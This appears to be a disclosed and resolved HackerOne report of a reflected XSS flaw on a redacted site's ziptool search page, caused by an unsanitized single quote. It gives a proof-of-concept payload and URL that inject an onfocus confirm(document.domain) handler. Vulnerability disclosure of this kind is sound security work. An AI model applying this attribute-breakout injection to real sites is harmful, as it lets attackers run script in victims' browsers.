Reflected Xss in [██████]
Medium
Vulnerability Details
**Description:**
Reflected XSS in █████████ due to unsanitized single quote `'`.
## Impact
An attacker could execute arbitrary javascript, and perform malicious actions !
## Step-by-step Reproduction Instructions
1. Used payload: `simo%27onfocus=%27confirm(document.domain)%27name=%27simo%27#simo`
2. Visit the url, the alert box should pop up !:
`https://www.█████/gri/ziptool/search.aspx?a=1simo%27onfocus=%27confirm(document.domain)%27name=%27simo%27#simo`
█████████
## Suggested Mitigation/Remediation Actions
Sanitize single quote !
## Impact
An attacker could execute arbitrary javascript in the client browser .
Actions
View on HackerOneReport Stats
- Report ID: 1033253
- State: Closed
- Substate: resolved
- Upvotes: 3